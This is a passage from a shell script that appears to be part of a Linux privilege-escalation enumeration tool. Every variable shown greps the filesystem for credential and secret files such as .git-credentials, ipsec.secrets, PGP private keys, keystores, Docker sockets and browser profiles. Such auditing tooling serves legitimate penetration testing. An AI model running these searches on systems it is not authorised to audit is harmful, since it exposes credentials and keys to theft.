"$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) - PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "neo4j$" | sort | uniq | head -n 70) - PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) - PSTORAGE_ERLANG=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_SIP=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "sip\.conf$|amportal\.conf$|FreePBX\.conf$|Elastix\.conf$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_VIRTUAL_DISKS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.vhd$|.*\.vhdx$|.*\.vmdk$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GIT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.git-credentials$" | sort | uniq | head -n 70) - PSTORAGE_ATLANTIS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "atlantis\.db$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/lib' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E 'README.gnupg' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.pgp$|.*\.gpg$|private-keys-v1\.d/.*\.key$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$|dockershim\.sock$|containerd\.sock$|crio\.sock$|frakti\.sock$|rktlet\.sock$|\.docker$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e 